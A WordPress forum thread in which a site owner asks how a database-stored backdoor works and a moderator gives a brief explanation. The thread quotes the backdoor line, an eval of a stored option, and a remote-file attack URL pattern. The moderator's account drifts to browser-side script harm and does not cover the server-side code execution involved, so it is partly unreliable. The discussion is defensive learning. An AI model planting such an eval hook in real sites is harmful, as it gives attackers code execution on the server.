Question regarding a backdoor entry in a database

  • Hello,

    This is a theoretical question, at the moment (fortunately) no website of mine appears to be affected. However, as the saying goes, “know your enemy”.

    On https://blog.sucuri.net/2011/09/ask-sucuri-what-about-the-backdoors.html , while I was documenting myself on backdoor patterns, I found a mention in particular that puzzled me :

    ?
    A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)
    return @eval(get_option(\’blogopt1\’));
    ?

    Simply said, I don’t manage to understand how this precise database-centered backdoor works ?!?

    Please, if you see the gist of it, could you enlighten me ?

    I only understand the basical stuff, that’s it’s about executing “as is” a string of text stored under the name “blogopt1” in the database.

    However, it will require for something within the blog itself to query this option, won’t it ?
    – Can it be queried from an oooooold post edited with an appropriate code, possibly the return @eval(database option) ? And then opening this post as a visitor would be enough to trigger the eval scripted action ?
    – Or would it require more stuff to be executed, like a visible change, not in the posts, but in one of the template’s files ? (an option I would very much prefer, comparing backups against a fresh FTP-mass-download is easy)
    – Or, to the contrary, could it be simply parsed through something inside the URL after our blog’s domain ?
    (for the last case, “enriched” URL, for instance, I know it is technically feasible under certain circumstances, I know it has been done with timthumb attacks, I’ve had a blog flooded with “/?pingnow=eval&file=URL” attack attempts, at a time)

    These may be newbie AND candid questions, however, since I have no idea, precisely, I would need to be able to understand it…

    Thank you very much if you can have the patience to clarify this case to me, I’ll be very grateful ??

Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter Sabinou

    (@sabinou1)

    Really, nobody knows ?

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    That’s a good article on Sucuri’s website, you’d probably get a better answer posting a comment there. ??

    Simply put, someone compromises your blog and you clean out the file based malware/hack/really bad thing. But they also leave harmful data in the database. You clean out the files and believe that the issue is resolved but there maybe a time bomb left that’s not in the the file system.

    Most well written software will sanitize the data before inserting it into the database. This is done to ensure that only data that results in predictable outcomes i.e. no scripts, no code execution.

    But if your installation was compromised, unsafe data in the options can be inserted that can result in bad things if displayed in your browser.

    The normal option being displayed is just sanitized text. But the bad non-sanitized option data could be harmful to you when displayed in your browser.

    That bad thing can include code execution of javascript on your browser to do more bad things to you such as send you to an infected site to download a keystroke logger.

    Hope that helps explain it a bit.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Question regarding a backdoor entry in a database’ is closed to new replies.